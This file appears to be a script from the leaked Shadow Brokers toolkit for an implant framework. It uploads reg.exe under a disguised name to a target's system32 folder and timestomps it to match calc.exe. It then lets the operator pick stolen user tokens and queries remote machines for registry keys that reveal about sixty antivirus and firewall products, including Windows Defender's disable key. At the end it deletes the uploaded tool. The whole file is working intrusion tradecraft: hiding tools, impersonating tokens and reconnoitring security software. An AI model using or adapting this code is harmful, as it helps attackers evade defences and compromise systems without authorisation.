shadowbrokers-exploits/windows/Resources/Ep/Scripts/r_reg.eps
2017-04-14 11:45:07 +02:00

323 lines
12 KiB
PostScript

#-------------------------------------------------------------------------------
# File: r_reg.eps
# Description: Uploads the reg.exe tool to the targets system32 directory.
# 27 August 2008 Created....
#
#-------------------------------------------------------------------------------
string $ScriptsDir = GetEnv("SCRIPTSDIR");
string $sSysPath = GetEnv("SYSPATH");
string $remoteToolName = GetEnv("remoteToolName");
if ($remoteToolName == "") {
$remoteToolName="$sSysPath\\cmdl16.exe";
}
string $viable;
string $values;
string $psp;
string $reg;
string $os;
string $osreg;
$psp[0] = "Symantec - Norton Anti-Virus [7.5]";
$psp[1] = "Symantec - Norton Anti-Virus [2003 - 2008]";
$psp[2] = "Symantec - Endpoint Protection";
$psp[3] = "Symantec - Sygate Personal Firewall [5.6]";
$psp[4] = "McAfee - VirusScan [7.0 - 8.0]";
$psp[5] = "McAfee - VirusScan [8.0]-> Prevent DLL creation in SYSROOT";
$psp[6] = "McAfee - VirusScan [8.0]-> Prevent EXE creation in SYSROOT";
$psp[7] = "McAfee - VirusScan [8.0]-> Prevent DLL creation in SYSTEM32";
$psp[8] = "McAfee - VirusScan [8.0]-> Prevent EXE creation in SYSTEM32";
$psp[9] = "McAfee - VirusScan [8.5]";
$psp[10] = "McAfee - VirusScan [8.5]-> Access Protection Rules";
$psp[11] = "Kaspersky Lab - Anti-Virus [6]";
$psp[12] = "Kaspersky Lab - Anti-Virus [6]-> Enviroment";
$psp[13] = "Kaspersky Lab - Anti-Virus [6]-> Registry Guard";
$psp[14] = "Kaspersky Lab - Anti-Virus [6]-> Dangerous Behavior";
$psp[15] = "Kaspersky Lab - Anti-Virus [6]-> Process Injection";
$psp[16] = "Kaspersky Lab - Anti-Virus [6]-> Process Hiding";
$psp[17] = "Kaspersky Lab - Anti-Virus [6]-> Behavior Blocking";
$psp[18] = "Kaspersky Lab - Anti-Virus [7 , 2009]";
$psp[19] = "Kaspersky Lab - Anti-Virus [7]-> Enviroment";
$psp[20] = "Kaspersky Lab - Anti-Virus [7]-> Registry Guard";
$psp[21] = "Kaspersky Lab - Anti-Virus [7]-> Dangerous Behavior";
$psp[22] = "Kaspersky Lab - Anti-Virus [7]-> Process Injection";
$psp[23] = "Kaspersky Lab - Anti-Virus [7]-> Process Hiding";
$psp[24] = "Kaspersky Lab - Anti-Virus [7]-> Behavior Blocking";
$psp[25] = "8Signs - 8Signs Firewall";
$psp[26] = "Ahn - Ahn Lab";
$psp[27] = "ALWIL Software - AVAST! [4.x]";
$psp[28] = "AVG - Anti-Virus,Anti-Spyware[7.5]";
$psp[29] = "AVIRA - AntiVir [Classic,Premium,Workstation,Security Suite]";
$psp[30] = "BitDefender - Total Security [2008]";
$psp[31] = "BlackIce - Firewall";
$psp[32] = "Checkpoint - Zone Alarm [Anti-Virus,Firewall,Security Suite 7]";
$psp[33] = "Comodo - Firwall Pro [3.0]";
$psp[34] = "Computer Associates - eTrust Security";
$psp[35] = "Computer Associates - eTrust Internet Security Suite";
$psp[36] = "Computer Associates - eTrust Anti-Virus [8.4]";
$psp[37] = "Computer Associates - eTrust Anti-Spyware [9.1]";
$psp[38] = "Computer Assoicates - eTrust Anti-Spam [5.1]";
$psp[39] = "Computer Assoicates - eTrust Firewall";
$psp[40] = "Computer Assoicates - Jinchen Kill";
$psp[41] = "DrWeb - Anti-Virus, Enterpise Edition";
$psp[42] = "ESET - Anti-Virus, Smart Security Suite [3.0]";
$psp[43] = "KingSoft - Internet Security [2008]";
$psp[44] = "KingSoft - Internet Security [2008]-> Firewall Level Lan";
$psp[45] = "KingSoft - Internet Security [2008]-> Firewall Level Wide";
$psp[46] = "KingSoft - Internet Security [2008]-> Anti-Virus Settings";
$psp[47] = "Microsoft - Antispyware";
$psp[48] = "Microsoft - Windows Defender";
$psp[49] = "Microsoft - Windows Defender-> Threat Severity";
$psp[50] = "Microsoft - Windows Defender-> Real-Time Protection";
$psp[51] = "Microsoft - Windows Defender-> Disable Key";
$psp[52] = "Panda Software - Anti Virus [Titanium, Platinium]";
$psp[53] = "Panda Software - Anti Virus [Lite]-> Product";
$psp[54] = "Panda Software - Anti Virus [Lite]-> Version";
$psp[55] = "Panda Software - Administrator [3]";
$psp[56] = "Rising - AntiVirus [2007,2008]-> Name";
$psp[57] = "Rising - AntiVirus [2007,2008]-> Version";
$psp[58] = "SiliVaccine - AntiVirus [2005]";
$psp[59] = "ThreatFire - Firewall";
$psp[60] = "Trend Micro - Internet Security [2007]";
$psp[61] = "Trend Micro - OfficeScan [7.3, 8.0]";
$reg[0] = "HKLM\\Software\\Symantec\\Symantec Antivirus\\Install";
$reg[1] = "HKLM\\Software\\Symantec\\Norton Antivirus\\version";
$reg[2] = "HKLM\\software\\symantec\\symantec endpoint protection";
$reg[3] = "HKLM\\software\\Sygate Technologies, Inc.\\Sygate Personal Firewall\\version";
$reg[4] = "HKLM\\Software\\Network Associates\\ePolicy Orchestrator\\Application Plugins";
$reg[5] = "HKLM\\software\\network associates\\tvd\\shared components\\on access scanner\\behaviourblocking\\FileBlockEnabled_27";
$reg[6] = "HKLM\\software\\network associates\\tvd\\shared components\\on access scanner\\behaviourblocking\\FileBlockEnabled_28";
$reg[7] = "HKLM\\software\\network associates\\tvd\\shared components\\on access scanner\\behaviourblocking\\FileBlockEnabled_29";
$reg[8] = "HKLM\\software\\network associates\\tvd\\shared components\\on access scanner\\behaviourblocking\\FileBlockEnabled_30";
$reg[9] = "HKLM\\Software\\McAfee\\ePolicy Orchestrator\\Application Plugins";
$reg[10] = "HKLM\\software\\McAfee\\VSCore\\On Access Scanner\\BehaviourBlocking\\AccessProtectionUserRules";
$reg[11] = "HKLM\\Software\\KasperskyLab\\AVP6";
$reg[12] = "HKLM\\Software\\KasperskyLab\\AVP6\\environment";
$reg[13] = "HKLM\\software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\bRegMonitoring_Enabled";
$reg[14] = "HKLM\\Software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0000";
$reg[15] = "HKLM\\Software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0002";
$reg[16] = "HKLM\\Software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0003";
$reg[17] = "HKLM\\software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\enabled";
$reg[18] = "HKLM\\software\\kasperskylab\\protected";
$reg[19] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\environment";
$reg[20] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\bRegMonitoring_Enabled";
$reg[21] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0000";
$reg[22] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0002";
$reg[23] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0003";
$reg[24] = "HKLM\\software\\kasperskylab\\protectedb\\AVP7\\profiles\\behavior_blocking\\enabled";
$reg[25] = "HKLM\\software\\8signs\\8signs Firewall";
$reg[26] = "HKLM\\software\\ahnlab";
$reg[27] = "HKLM\\software\\ALWIL Software\\AVAST";
$reg[28] = "HKLM\\software\\Grisoft";
$reg[29] = "HKLM\\software\\Avira";
$reg[30] = "HKLM\\software\\BitDefender";
$reg[31] = "HKLM\\software\\Network Ice\\BlackIce";
$reg[32] = "HKLM\\software\\zone labs\\zone alarm\\CurrentVersion";
$reg[33] = "HKLM\\software\\comodogroup\\cdi\\1\\product version";
$reg[34] = "HKLM\\software\\computerassociates\\eTrust Suite Personal";
$reg[35] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\Suite\\version";
$reg[36] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\AV\\version";
$reg[37] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\PP\\version";
$reg[38] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\AS\\version";
$reg[39] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\pfw\\version";
$reg[40] = "HKLM\\software\\computerassoicates\\eTrustITM\\CurrentVersion\\Version";
$reg[41] = "HKLM\\software\\Doctor Web, Ltd";
$reg[42] = "HKLM\\software\\eset\\eset security\\currentversion\\info";
$reg[43] = "HKLM\\Software\\Kingsoft\\antispy\\installpath";
$reg[44] = "HKCU\\Software\\Kingsoft\\antivirus\\KavPFW\\Security Level Lan";
$reg[45] = "HKCU\\Software\\Kingsoft\\antivirus\\KavPFW\\Security Level Wide";
$reg[46] = "HKLM\\Software\\Kingsoft\\antivirus\\KWatchSVC";
$reg[47] = "HKLM\\Software\\GIANTCompany\\AntiSpyware";
$reg[48] = "HKLM\\Software\\Microsoft\\Windows Defender";
$reg[49] = "HKLM\\Software\\Microsoft\\Windows Defender\\Threats\\ThreatSeverityDefaultAction";
$reg[50] = "HKLM\\Software\\Microsoft\\Windows Defender\\Real-Time Protection";
$reg[51] = "HKLM\\Software\\Microsoft\\Windows Defender\\DisableAntiSpyware";
$reg[52] = "HKLM\\Software\\panda software\\pavshld\\products";
$reg[53] = "HKLM\\Software\\panda software\\panda antivirus lite\\product";
$reg[54] = "HKLM\\Software\\panda software\\panda antivirus lite\\version";
$reg[55] = "HKLM\\Software\\panda software";
$reg[56] = "HKLM\\Software\\rising\\rav\\name";
$reg[57] = "HKLM\\Software\\rising\\rav\\version";
$reg[58] = "HKLM\\Software\\STS Tech-Service\\SVaccine";
$reg[59] = "HKLM\\Software\\PCTools\\ThreatFire";
$reg[60] = "HKLM\\Software\\TrendMicro\\PC-cillin";
$reg[61] = "HKLM\\Software\\TrendMicro\\PC-cillinNTCorp\\CurrentVersion\\Misc.\\ProgramVer";
$os[0] = "Microsoft Windows XP - Professional Service Pack 3";
$osreg[0] = "HKLM\\software\\microsoft\\updates\\windows xp\\sp3";
string $split = SplitPath("$remoteToolName");
@echo on;
ifnot (prompt "Do you want to upload the tool as \"$remoteToolName\" ?") {
$remoteToolName=GetInput("What do you want to upload the tool as?");
}
ifnot (`put $ScriptsDir\\..\\..\\Tools\\REG.exe -name $remoteToolName`) {
echo "File already exists?";
return false;
}
`matchtimes $sSysPath\\calc.exe $remoteToolName`;
string $remotemachine = GetInput("Enter Remote Machine [1.2.3.4 or netbios_name]");
ifnot(getViableTokens($viable, $values)) {
echo "";
echo "---------------------------------";
echo "| Couldn't get Exisiting Tokens |";
echo "---------------------------------";
}
echo "";
echo "";
echo "";
int $idx = 0;
int $j = 0;
echo "($j). QUIT";
while($idx < sizeof($viable)) {
$j++;
echo "($j). Use Token $viable[$idx] ($values[$idx])";
$idx++;
}
$j++;
echo "($j). Enter own user";
$j++;
echo "($j). Already authenicated (WORKGROUP ZB)";
int $choice = GetInput("Enter the desired option");
int $j1 = $j;
$j1--;
string $user;
if($choice == 0){
if (prompt `del $split[1] -path "$split[0]"`){
sleep(300);
`dir $split[1] -path "$split[0]"`;
}
return true;
}else if($choice == $j) {
$user = "";
}else if($choice == $j1){
$user = GetInput("Enter User/Token name");
}else{
$choice--;
$user = $viable[$choice];
}
while(prompt "Query target for Registry Key? [DO NOT QUIT, NO WILL STOP SCRIPT EXECUTE CLEANUP]") {
int $i = 0;
int $ind = 0;
echo "($i). Quit";
while($ind < sizeof($psp)) {
$i++;
echo "($i). PSP: $psp[$ind]";
$ind++;
}
$ind = 0;
while($ind < sizeof($os)) {
$i++;
echo "($i). OS: $os[$ind]";
$ind++;
}
$i++;
echo "($i). Enter custom query";
int $regchoice = GetInput("Enter the desired query");
string $key;
if($regchoice == 0){
if (prompt `del $split[1] -path "$split[0]"`){
sleep(300);
`dir $split[1] -path "$split[0]"`;
}
return true;
} else if($regchoice == $i) {
$key = GetInput("Enter Reg Key [Ex: HKLM\\Software\\PSP Key]");
} else{
$regchoice--;
if($regchoice < sizeof($psp)) {
$key = $reg[$regchoice];
}else{
int $idx1 = 0;
while($idx1 < sizeof($psp)){
$regchoice--;
$idx1++;
}
$key = $osreg[$regchoice];
}
}
if($user == ""){
prompt `run -command "$remoteToolName QUERY \\"$key\\" \\\\$remotemachine" -redirect`;
}else{
prompt `user=$user run -command "$remoteToolName QUERY \\"$key\\" \\\\$remotemachine" -redirect`;
}
}
if (prompt `del $split[1] -path "$split[0]"`){
sleep(300);
`dir $split[1] -path "$split[0]"`;
}
return true;
sub getViableTokens(REF string $token, REF string $value) {
@record on;
`lpgetenv`;
@record off;
string $envOption = GetCmdData("option");
string $envValue = GetCmdData("value");
ifnot(defined($envOption)) {
echo "Unable to list tokens";
return false;
}
string $viableTokens;
int $j = 0;
int $k = 0;
while($j < sizeof($envOption)) {
string $temp = split("_USER_", $envOption[$j]);
if(sizeof($temp) == 2) {
if(strlen($temp[0]) == 0) {
$token[$k] = $temp[1];
$value[$k] = $envValue[$j];
$k++;
}
}
$j++;
}
return true;
}
#10.11.202.2